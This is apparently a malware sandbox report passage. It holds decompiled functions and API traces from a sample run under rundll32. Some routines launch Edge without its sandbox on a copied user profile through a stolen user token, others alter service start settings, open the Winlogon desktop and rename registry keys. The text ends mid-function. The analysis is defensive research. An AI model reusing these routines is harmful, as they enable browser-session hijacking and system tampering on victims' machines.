                                                                                              0x04256993
                                                                                              0x04256a31
                                                                                              0x04256a3c
                                                                                              0x04256999
                                                                                              0x042569a5
                                                                                              0x042569c1
                                                                                              0x042569d3
                                                                                              0x042569eb
                                                                                              0x042569fd
                                                                                              0x04256a00
                                                                                              0x04256a07
                                                                                              0x04256a11
                                                                                              0x04256a13
                                                                                              0x04256a29
                                                                                              0x04256a29

                                                                                              APIs
                                                                                                • Part of subcall function 04267240: LoadLibraryA.KERNEL32(Wtsapi32.dll,?,?,?,042568B1), ref: 04267269
                                                                                                • Part of subcall function 04267240: GetProcAddress.KERNEL32(00000000,WTSQueryUserToken), ref: 04267279
                                                                                                • Part of subcall function 04267240: CloseHandle.KERNEL32(?,?,?,?,042568B1), ref: 042672A0
                                                                                              • lstrcatW.KERNEL32(?,\AppData\Local\Microsoft\Edge\User Data), ref: 042569A5
                                                                                              • wsprintfW.USER32 ref: 042569C1
                                                                                                • Part of subcall function 042673D0: lstrcpyW.KERNEL32(?,?), ref: 04267414
                                                                                                • Part of subcall function 042673D0: lstrcatW.KERNEL32(?,0429F170), ref: 0426742C
                                                                                                • Part of subcall function 042673D0: CreateDirectoryW.KERNEL32(?,00000000), ref: 04267431
                                                                                                • Part of subcall function 042673D0: GetLastError.KERNEL32 ref: 04267441
                                                                                                • Part of subcall function 042673D0: FindFirstFileW.KERNEL32(?,?), ref: 0426745C
                                                                                                • Part of subcall function 042673D0: lstrcpyW.KERNEL32(?,?), ref: 042674A3
                                                                                                • Part of subcall function 042673D0: lstrcatW.KERNEL32(?,0429D92C), ref: 042674B5
                                                                                                • Part of subcall function 042673D0: lstrcatW.KERNEL32(?,?), ref: 042674C5
                                                                                                • Part of subcall function 042673D0: lstrcpyW.KERNEL32(?,?), ref: 042674EA
                                                                                                • Part of subcall function 042673D0: lstrcatW.KERNEL32(?,0429D92C), ref: 042674FC
                                                                                                • Part of subcall function 042673D0: lstrcatW.KERNEL32(?,?), ref: 0426750C
                                                                                                • Part of subcall function 042673D0: lstrcmpW.KERNEL32(?,0429D940), ref: 04267523
                                                                                                • Part of subcall function 042673D0: lstrcmpW.KERNEL32(?,0429D944), ref: 04267535
                                                                                              • wsprintfW.USER32 ref: 042569EB
                                                                                                • Part of subcall function 042672E0: LoadLibraryA.KERNEL32(Wtsapi32.dll), ref: 04267329
                                                                                                • Part of subcall function 042672E0: GetProcAddress.KERNEL32(00000000,WTSQueryUserToken), ref: 04267339
                                                                                                • Part of subcall function 042672E0: CreateProcessAsUserW.ADVAPI32(?,00000000,04256938,00000000,00000000,00000000,00000400,?,00000000,00000044,?), ref: 04267386
                                                                                              Strings
                                                                                              • \AppData\Local\Microsoft\Edge\User Data, xrefs: 04256999
                                                                                              • cmd.exe /c start msedge.exe --no-sandbox --allow-no-sandbox-job --disable-3d-apis --disable-gpu --disable-d3d11 --user-data-dir="%, xrefs: 042569E5
                                                                                              • %s%s, xrefs: 042569BB
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: lstrcat$lstrcpy$AddressCreateLibraryLoadProclstrcmpwsprintf$CloseDirectoryErrorFileFindFirstHandleLastProcessUser
                                                                                              • String ID: %s%s$\AppData\Local\Microsoft\Edge\User Data$cmd.exe /c start msedge.exe --no-sandbox --allow-no-sandbox-job --disable-3d-apis --disable-gpu --disable-d3d11 --user-data-dir="%
                                                                                              • API String ID: 3549361973-1065409233
                                                                                              • Opcode ID: 7e7b50a3f2ca374a91fa9fa6519974a938a1213bf04fc8cd537936238a2149c1
                                                                                              • Instruction ID: 202fd8d3fd33e349c1f21b0c68cf3700b05090f0479ad940a6bc6a0b0244c5ce
                                                                                              • Opcode Fuzzy Hash: 7e7b50a3f2ca374a91fa9fa6519974a938a1213bf04fc8cd537936238a2149c1
                                                                                              • Instruction Fuzzy Hash: 182154B1F6011D57CF20EB64DD899DAB3BCEF54308F4041E6A50992140EB70AA95CF95
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 95%
                                                                                              			E0427E651(void* __ecx) {
                                                                                              				void* _t4;
                                                                                              				void* _t11;
                                                                                              				void* _t16;
                                                                                              				long _t25;
                                                                                              				void* _t28;
                                                                                              
                                                                                              				if( *0x42a4010 != 0xffffffff) {
                                                                                              					_t25 = GetLastError();
                                                                                              					_t11 = E0427E94E(__eflags,  *0x42a4010);
                                                                                              					__eflags = _t11 - 0xffffffff;
                                                                                              					if(_t11 == 0xffffffff) {
                                                                                              						L5:
                                                                                              						_t11 = 0;
                                                                                              					} else {
                                                                                              						__eflags = _t11;
                                                                                              						if(__eflags == 0) {
                                                                                              							_t4 = E0427E988(__eflags,  *0x42a4010, 0xffffffff);
                                                                                              							_pop(_t16);
                                                                                              							__eflags = _t4;
                                                                                              							if(_t4 != 0) {
                                                                                              								_t28 = E04288535(_t16, 1, 0x28);
                                                                                              								__eflags = _t28;
                                                                                              								if(__eflags == 0) {
                                                                                              									L8:
                                                                                              									_t11 = 0;
                                                                                              									E0427E988(__eflags,  *0x42a4010, 0);
                                                                                              								} else {
                                                                                              									__eflags = E0427E988(__eflags,  *0x42a4010, _t28);
                                                                                              									if(__eflags != 0) {
                                                                                              										_t11 = _t28;
                                                                                              										_t28 = 0;
                                                                                              										__eflags = 0;
                                                                                              									} else {
                                                                                              										goto L8;
                                                                                              									}
                                                                                              								}
                                                                                              								E042884AD(_t28);
                                                                                              							} else {
                                                                                              								goto L5;
                                                                                              							}
                                                                                              						}
                                                                                              					}
                                                                                              					SetLastError(_t25);
                                                                                              					return _t11;
                                                                                              				} else {
                                                                                              					return 0;
                                                                                              				}
                                                                                              			}








                                                                                              0x0427e658
                                                                                              0x0427e66b
                                                                                              0x0427e672
                                                                                              0x0427e675
                                                                                              0x0427e678
                                                                                              0x0427e691
                                                                                              0x0427e691
                                                                                              0x0427e67a
                                                                                              0x0427e67a
                                                                                              0x0427e67c
                                                                                              0x0427e686
                                                                                              0x0427e68c
                                                                                              0x0427e68d
                                                                                              0x0427e68f
                                                                                              0x0427e69f
                                                                                              0x0427e6a3
                                                                                              0x0427e6a5
                                                                                              0x0427e6b9
                                                                                              0x0427e6b9
                                                                                              0x0427e6c2
                                                                                              0x0427e6a7
                                                                                              0x0427e6b5
                                                                                              0x0427e6b7
                                                                                              0x0427e6cb
                                                                                              0x0427e6cd
                                                                                              0x0427e6cd
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0427e6b7
                                                                                              0x0427e6d0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0427e68f
                                                                                              0x0427e67c
                                                                                              0x0427e6d8
                                                                                              0x0427e6e2
                                                                                              0x0427e65a
                                                                                              0x0427e65c
                                                                                              0x0427e65c

                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(00000001,?,0427DBC5,04275C3D,042760E1,?,042762F1,?,00000001,?,?,00000001,?,042A15F0,0000000C,042763DA), ref: 0427E65F
                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0427E66D
                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0427E686
                                                                                              • SetLastError.KERNEL32(00000000,042762F1,?,00000001,?,?,00000001,?,042A15F0,0000000C,042763DA,?,00000001,?), ref: 0427E6D8
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                              • String ID:
                                                                                              • API String ID: 3852720340-0
                                                                                              • Opcode ID: 5194f0bdbc1de27291bcd59c6718df751a5f718917ef45939973e67c3c458100
                                                                                              • Instruction ID: a06a4608a64095612f6a6c53f582a0c49577449e45672fc74be9968cb6771cf5
                                                                                              • Opcode Fuzzy Hash: 5194f0bdbc1de27291bcd59c6718df751a5f718917ef45939973e67c3c458100
                                                                                              • Instruction Fuzzy Hash: D701D8337792129FB738397D7CC862B6648DB012797620369E530840E1EFB5BC257174
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 67%
                                                                                              			E04260BE0(void* __ecx, short* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                              				void* _v8;
                                                                                              				void* _v12;
                                                                                              				struct HINSTANCE__* _t9;
                                                                                              				_Unknown_base(*)()* _t10;
                                                                                              				short* _t17;
                                                                                              				_Unknown_base(*)()* _t21;
                                                                                              				int _t25;
                                                                                              
                                                                                              				_t17 = __edx;
                                                                                              				_v12 = __ecx;
                                                                                              				_t9 = LoadLibraryA("Advapi32.dll");
                                                                                              				if(_t9 != 0) {
                                                                                              					_t10 = GetProcAddress(_t9, "RegRenameKey");
                                                                                              					_t21 = _t10;
                                                                                              					if(_t21 != 0) {
                                                                                              						_t25 = 0;
                                                                                              						_v8 = 0;
                                                                                              						if(RegOpenKeyExW(_v12, _t17, 0, 0x20106,  &_v8) == 0) {
                                                                                              							 *_t21(_v8, _a4, _a8);
                                                                                              							asm("sbb esi, esi");
                                                                                              							_t25 = 1;
                                                                                              							RegCloseKey(_v8);
                                                                                              						}
                                                                                              						return _t25;
                                                                                              					} else {
                                                                                              						return _t10;
                                                                                              					}
                                                                                              				} else {
                                                                                              					return _t9;
                                                                                              				}
                                                                                              			}










                                                                                              0x04260bec
                                                                                              0x04260bee
                                                                                              0x04260bf1
                                                                                              0x04260bf9
                                                                                              0x04260c07
                                                                                              0x04260c0d
                                                                                              0x04260c11
                                                                                              0x04260c1d
                                                                                              0x04260c2a
                                                                                              0x04260c35
                                                                                              0x04260c40
                                                                                              0x04260c47
                                                                                              0x04260c49
                                                                                              0x04260c4a
                                                                                              0x04260c4a
                                                                                              0x04260c58
                                                                                              0x04260c13
                                                                                              0x04260c18
                                                                                              0x04260c18
                                                                                              0x04260bff
                                                                                              0x04260bff
                                                                                              0x04260bff

                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(Advapi32.dll), ref: 04260BF1
                                                                                              • GetProcAddress.KERNEL32(00000000,RegRenameKey), ref: 04260C07
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryLoadProc
                                                                                              • String ID: Advapi32.dll$RegRenameKey
                                                                                              • API String ID: 2574300362-2310806928
                                                                                              • Opcode ID: b07c5f12e4c6efc8dfc1eb4d3e8aeef50eb336db4e32b3475f85e29cfc985b01
                                                                                              • Instruction ID: d674a25755b377bea5040379292a89c6f7347c6208d623e2ea0d9e7475b062e3
                                                                                              • Opcode Fuzzy Hash: b07c5f12e4c6efc8dfc1eb4d3e8aeef50eb336db4e32b3475f85e29cfc985b01
                                                                                              • Instruction Fuzzy Hash: B401203274421DBB4F119FA9BD09C5EBF7DEF84556B200151FD09D2100D7324D51D690
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 91%
                                                                                              			E04263870(short* __ecx) {
                                                                                              				void* _v8;
                                                                                              				void* _t7;
                                                                                              				short* _t12;
                                                                                              				void* _t14;
                                                                                              				int _t17;
                                                                                              				void* _t20;
                                                                                              
                                                                                              				_push(__ecx);
                                                                                              				_t17 = 0;
                                                                                              				_t12 = __ecx;
                                                                                              				_t20 = OpenSCManagerW(0, 0, 0xf003f);
                                                                                              				if(_t20 != 0) {
                                                                                              					_t14 = OpenServiceW(_t20, _t12, 0xf01ff);
                                                                                              					if(_t14 != 0) {
                                                                                              						_t7 = LockServiceDatabase(_t20);
                                                                                              						_v8 = _t7;
                                                                                              						if(_t7 != 0) {
                                                                                              							_t17 = ChangeServiceConfigW(_t14, 0xffffffff, 2, 0xffffffff, 0, 0, 0, 0, 0, 0, 0);
                                                                                              							UnlockServiceDatabase(_v8);
                                                                                              						}
                                                                                              						CloseServiceHandle(_t14);
                                                                                              					}
                                                                                              					CloseServiceHandle(_t20);
                                                                                              				}
                                                                                              				return _t17;
                                                                                              			}









                                                                                              0x04263873
                                                                                              0x0426387c
                                                                                              0x0426387e
                                                                                              0x04263888
                                                                                              0x0426388c
                                                                                              0x0426389b
                                                                                              0x0426389f
                                                                                              0x042638a2
                                                                                              0x042638a8
                                                                                              0x042638ad
                                                                                              0x042638c6
                                                                                              0x042638c8
                                                                                              0x042638c8
                                                                                              0x042638cf
                                                                                              0x042638cf
                                                                                              0x042638d6
                                                                                              0x042638d6
                                                                                              0x042638e4

                                                                                              APIs
                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,04263BAF), ref: 04263882
                                                                                              • OpenServiceW.ADVAPI32(00000000,?,000F01FF,?,?,?,?,?,04263BAF), ref: 04263895
                                                                                              • LockServiceDatabase.ADVAPI32(00000000), ref: 042638A2
                                                                                              • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000002,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,000F01FF), ref: 042638BD
                                                                                              • UnlockServiceDatabase.ADVAPI32(?), ref: 042638C8
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,000F01FF,?,?,?,?,?,04263BAF), ref: 042638CF
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,000F01FF,?,?,?,?,?,04263BAF), ref: 042638D6
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Service$CloseDatabaseHandleOpen$ChangeConfigLockManagerUnlock
                                                                                              • String ID:
                                                                                              • API String ID: 2762133943-0
                                                                                              • Opcode ID: e152cf89a1f6cd7260fb7146cc083dd14790ae8d381958b4acd011c5586d9c37
                                                                                              • Instruction ID: 9b61c7ccca71ecdbc2aa17337a32eb7f001f4c1c19b6efa4d85878f9871f6d03
                                                                                              • Opcode Fuzzy Hash: e152cf89a1f6cd7260fb7146cc083dd14790ae8d381958b4acd011c5586d9c37
                                                                                              • Instruction Fuzzy Hash: 2FF0C832709316BB871537AA7C4DD6B7E7CDF867657000224FE1AD2282DE688C028660
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 91%
                                                                                              			E042638F0(short* __ecx) {
                                                                                              				void* _v8;
                                                                                              				void* _t7;
                                                                                              				short* _t12;
                                                                                              				void* _t14;
                                                                                              				int _t17;
                                                                                              				void* _t20;
                                                                                              
                                                                                              				_push(__ecx);
                                                                                              				_t17 = 0;
                                                                                              				_t12 = __ecx;
                                                                                              				_t20 = OpenSCManagerW(0, 0, 0xf003f);
                                                                                              				if(_t20 != 0) {
                                                                                              					_t14 = OpenServiceW(_t20, _t12, 0xf01ff);
                                                                                              					if(_t14 != 0) {
                                                                                              						_t7 = LockServiceDatabase(_t20);
                                                                                              						_v8 = _t7;
                                                                                              						if(_t7 != 0) {
                                                                                              							_t17 = ChangeServiceConfigW(_t14, 0xffffffff, 3, 0xffffffff, 0, 0, 0, 0, 0, 0, 0);
                                                                                              							UnlockServiceDatabase(_v8);
                                                                                              						}
                                                                                              						CloseServiceHandle(_t14);
                                                                                              					}
                                                                                              					CloseServiceHandle(_t20);
                                                                                              				}
                                                                                              				return _t17;
                                                                                              			}









                                                                                              0x042638f3
                                                                                              0x042638fc
                                                                                              0x042638fe
                                                                                              0x04263908
                                                                                              0x0426390c
                                                                                              0x0426391b
                                                                                              0x0426391f
                                                                                              0x04263922
                                                                                              0x04263928
                                                                                              0x0426392d
                                                                                              0x04263946
                                                                                              0x04263948
                                                                                              0x04263948
                                                                                              0x0426394f
                                                                                              0x0426394f
                                                                                              0x04263956
                                                                                              0x04263956
                                                                                              0x04263964

                                                                                              APIs
                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,04263BB8), ref: 04263902
                                                                                              • OpenServiceW.ADVAPI32(00000000,?,000F01FF,?,?,?,?,?,04263BB8), ref: 04263915
                                                                                              • LockServiceDatabase.ADVAPI32(00000000), ref: 04263922
                                                                                              • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000003,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,000F01FF), ref: 0426393D
                                                                                              • UnlockServiceDatabase.ADVAPI32(?), ref: 04263948
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,000F01FF,?,?,?,?,?,04263BB8), ref: 0426394F
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,000F01FF,?,?,?,?,?,04263BB8), ref: 04263956
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Service$CloseDatabaseHandleOpen$ChangeConfigLockManagerUnlock
                                                                                              • String ID:
                                                                                              • API String ID: 2762133943-0
                                                                                              • Opcode ID: e1fdd602c2670515b0366ee75541163e779469ba8ac56f79ce798c52e3cc26df
                                                                                              • Instruction ID: 17d116a52d8daadafbc0ddda4378630478d9f20d6fe6f43719791d42476ca101
                                                                                              • Opcode Fuzzy Hash: e1fdd602c2670515b0366ee75541163e779469ba8ac56f79ce798c52e3cc26df
                                                                                              • Instruction Fuzzy Hash: A5F0C83270A3167787157BAABC4DD6B7E7CDB867757000214FE16D2282DE688D028560
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E04271D50(void* __ecx, intOrPtr _a4) {
                                                                                              				struct _CRITICAL_SECTION* _t20;
                                                                                              				void* _t24;
                                                                                              
                                                                                              				_t24 = __ecx;
                                                                                              				if( *((intOrPtr*)(__ecx + 0x24)) == 2) {
                                                                                              					_t20 = __ecx + 0x28;
                                                                                              					if(TryEnterCriticalSection(_t20) == 0) {
                                                                                              						L8:
                                                                                              						return 1;
                                                                                              					} else {
                                                                                              						if( *((intOrPtr*)(_t24 + 0x24)) == 2) {
                                                                                              							if(_a4 == 0) {
                                                                                              								E04271100( *((intOrPtr*)(_t24 + 0x40)), timeGetTime());
                                                                                              								LeaveCriticalSection(_t20);
                                                                                              								goto L8;
                                                                                              							} else {
                                                                                              								E04270B00( *((intOrPtr*)(_t24 + 0x40)));
                                                                                              								LeaveCriticalSection(_t20);
                                                                                              								return 1;
                                                                                              							}
                                                                                              						} else {
                                                                                              							SetLastError(0x139f);
                                                                                              							LeaveCriticalSection(_t20);
                                                                                              							return 0;
                                                                                              						}
                                                                                              					}
                                                                                              				} else {
                                                                                              					SetLastError(0x139f);
                                                                                              					return 0;
                                                                                              				}
                                                                                              			}





                                                                                              0x04271d54
                                                                                              0x04271d5a
                                                                                              0x04271d6f
                                                                                              0x04271d7b
                                                                                              0x04271dd4
                                                                                              0x04271ddc
                                                                                              0x04271d7d
                                                                                              0x04271d81
                                                                                              0x04271da1
                                                                                              0x04271dc8
                                                                                              0x04271dce
                                                                                              0x00000000
                                                                                              0x04271da3
                                                                                              0x04271da6
                                                                                              0x04271dac
                                                                                              0x04271dba
                                                                                              0x04271dba
                                                                                              0x04271d83
                                                                                              0x04271d88
                                                                                              0x04271d8f
                                                                                              0x04271d9a
                                                                                              0x04271d9a
                                                                                              0x04271d81
                                                                                              0x04271d5c
                                                                                              0x04271d61
                                                                                              0x04271d6b
                                                                                              0x04271d6b

                                                                                              APIs
                                                                                              • SetLastError.KERNEL32(0000139F), ref: 04271D61
                                                                                              • RtlTryEnterCriticalSection.NTDLL(?), ref: 04271D73
                                                                                              • SetLastError.KERNEL32(0000139F), ref: 04271D88
                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 04271D8F
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CriticalErrorLastSection$EnterLeave
                                                                                              • String ID:
                                                                                              • API String ID: 2124651672-0
                                                                                              • Opcode ID: 5ab4de073aa20e459f9f09e06487646f7c118489472f0971f47b1e627ee9a8e4
                                                                                              • Instruction ID: 38c6f0040d847036dfa7dae42c80b56431ab68b3e53730d8148dfbe7a9cb66e4
                                                                                              • Opcode Fuzzy Hash: 5ab4de073aa20e459f9f09e06487646f7c118489472f0971f47b1e627ee9a8e4
                                                                                              • Instruction Fuzzy Hash: B50175323142009BD724A7ADF40C9FBF7ACEF95762B00402AF106D1640CB75AC52CA65
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E042656E0() {
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				struct HDESK__* _t12;
                                                                                              				struct HDESK__* _t13;
                                                                                              
                                                                                              				_t12 = GetThreadDesktop(GetCurrentThreadId());
                                                                                              				_t13 = OpenDesktopA("Winlogon", 0, 0, 0x400001cf);
                                                                                              				if(_t13 == 0) {
                                                                                              					L3:
                                                                                              					return 0;
                                                                                              				} else {
                                                                                              					if(E04265660(_t13, _t12, _t13) != 0) {
                                                                                              						PostMessageW(0xffff, 0x312, 0, 0x2e0003);
                                                                                              						if(_t12 != 0) {
                                                                                              							E04265660(_t12, _t12, _t13);
                                                                                              						}
                                                                                              						return 1;
                                                                                              					} else {
                                                                                              						CloseDesktop(_t13);
                                                                                              						goto L3;
                                                                                              					}
                                                                                              				}
                                                                                              			}







                                                                                              0x042656fd
                                                                                              0x04265705
                                                                                              0x04265709
                                                                                              0x0426571e
                                                                                              0x04265721
                                                                                              0x0426570b
                                                                                              0x04265714
                                                                                              0x04265733
                                                                                              0x0426573b
                                                                                              0x0426573f
                                                                                              0x0426573f
                                                                                              0x0426574b
                                                                                              0x04265716
                                                                                              0x04265717
                                                                                              0x00000000
                                                                                              0x04265717
                                                                                              0x04265714

                                                                                              APIs
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 042656E2
                                                                                              • GetThreadDesktop.USER32(00000000,?,?,04261DAB), ref: 042656E9
                                                                                              • OpenDesktopA.USER32(Winlogon,00000000,00000000,400001CF), ref: 042656FF
                                                                                                • Part of subcall function 04265660: GetCurrentThreadId.KERNEL32 ref: 04265677
                                                                                                • Part of subcall function 04265660: GetThreadDesktop.USER32(00000000,?,00000000), ref: 0426567E
                                                                                                • Part of subcall function 04265660: GetUserObjectInformationW.USER32(00000000,00000002,?,00000100,?,?,00000000), ref: 0426569C
                                                                                              • CloseDesktop.USER32(00000000,?,?,04261DAB), ref: 04265717
                                                                                              • PostMessageW.USER32(0000FFFF,00000312,00000000,002E0003), ref: 04265733
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: DesktopThread$Current$CloseInformationMessageObjectOpenPostUser
                                                                                              • String ID: Winlogon
                                                                                              • API String ID: 3882203166-744610081
                                                                                              • Opcode ID: 8283837ded1e524ddb599ac6b377f602791120602e732ec83ca17f044ffa853a
                                                                                              • Instruction ID: 5b68fb6a1811855b4bc4ec2325362d3cd70f949a377d1d07cee9c87c56fd9ca6
                                                                                              • Opcode Fuzzy Hash: 8283837ded1e524ddb599ac6b377f602791120602e732ec83ca17f044ffa853a
                                                                                              • Instruction Fuzzy Hash: A8F0A73236421177E7323A68BC0DFAE2659DF85F65F190064F506EA1C0DF98ACC35659
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 69%
                                                                                              			E0428C4B8(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
                                                                                              				signed int _v8;
                                                                                              				int _v12;
                                                                                              				void* _v24;
                                                                                              				signed int _t49;
                                                                                              				signed int _t54;
                                                                                              				int _t58;
                                                                                              				signed int _t60;
                                                                                              				short* _t62;
                                                                                              				signed int _t66;
                                                                                              				short* _t70;
                                                                                              				int _t71;
                                                                                              				int _t78;
                                                                                              				short* _t81;
                                                                                              				signed int _t87;
                                                                                              				signed int _t90;
                                                                                              				void* _t95;
                                                                                              				void* _t96;
                                                                                              				int _t98;
                                                                                              				short* _t101;
                                                                                              				int _t103;
                                                                                              				signed int _t106;
                                                                                              				short* _t107;
                                                                                              				void* _t110;
                                                                                              
                                                                                              				_push(__ecx);
                                                                                              				_push(__ecx);
                                                                                              				_t49 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t49 ^ _t106;
                                                                                              				_push(__esi);
                                                                                              				_t103 = _a20;
                                                                                              				if(_t103 > 0) {
                                                                                              					_t78 = E0428EC2E(_a16, _t103);
                                                                                              					_t110 = _t78 - _t103;
                                                                                              					_t4 = _t78 + 1; // 0x1
                                                                                              					_t103 = _t4;
                                                                                              					if(_t110 >= 0) {
                                                                                              						_t103 = _t78;
                                                                                              					}
                                                                                              				}
                                                                                              				_t98 = _a32;
                                                                                              				if(_t98 == 0) {
                                                                                              					_t98 =  *( *_a4 + 8);
                                                                                              					_a32 = _t98;
                                                                                              				}
                                                                                              				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
                                                                                              				_v12 = _t54;
                                                                                              				if(_t54 == 0) {
                                                                                              					L38:
                                                                                              					return E04275AFE(_v8 ^ _t106);
                                                                                              				} else {
                                                                                              					_t95 = _t54 + _t54;
                                                                                              					_t85 = _t95 + 8;
                                                                                              					asm("sbb eax, eax");
                                                                                              					if((_t95 + 0x00000008 & _t54) == 0) {
                                                                                              						_t81 = 0;
                                                                                              						__eflags = 0;
                                                                                              						L14:
                                                                                              						if(_t81 == 0) {
                                                                                              							L36:
                                                                                              							_t105 = 0;
                                                                                              							L37:
                                                                                              							E0427F190(_t81);
                                                                                              							goto L38;
                                                                                              						}
                                                                                              						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
                                                                                              						_t121 = _t58;
                                                                                              						if(_t58 == 0) {
                                                                                              							goto L36;
                                                                                              						}
                                                                                              						_t100 = _v12;
                                                                                              						_t60 = E04289282(_t85, _t103, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0);
                                                                                              						_t105 = _t60;
                                                                                              						if(_t105 == 0) {
                                                                                              							goto L36;
                                                                                              						}
                                                                                              						if((_a12 & 0x00000400) == 0) {
                                                                                              							_t96 = _t105 + _t105;
                                                                                              							_t87 = _t96 + 8;
                                                                                              							__eflags = _t96 - _t87;
                                                                                              							asm("sbb eax, eax");
                                                                                              							__eflags = _t87 & _t60;
                                                                                              							if((_t87 & _t60) == 0) {
                                                                                              								_t101 = 0;
                                                                                              								__eflags = 0;
                                                                                              								L30:
                                                                                              								__eflags = _t101;
                                                                                              								if(__eflags == 0) {
                                                                                              									L35:
                                                                                              									E0427F190(_t101);
                                                                                              									goto L36;
                                                                                              								}
                                                                                              								_t62 = E04289282(_t87, _t105, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
                                                                                              								__eflags = _t62;
                                                                                              								if(_t62 == 0) {
                                                                                              									goto L35;
                                                                                              								}
                                                                                              								_push(0);
                                                                                              								_push(0);
                                                                                              								__eflags = _a28;
                                                                                              								if(_a28 != 0) {
                                                                                              									_push(_a28);
                                                                                              									_push(_a24);
                                                                                              								} else {
                                                                                              									_push(0);
                                                                                              									_push(0);
                                                                                              								}
                                                                                              								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
                                                                                              								__eflags = _t105;
                                                                                              								if(_t105 != 0) {
                                                                                              									E0427F190(_t101);
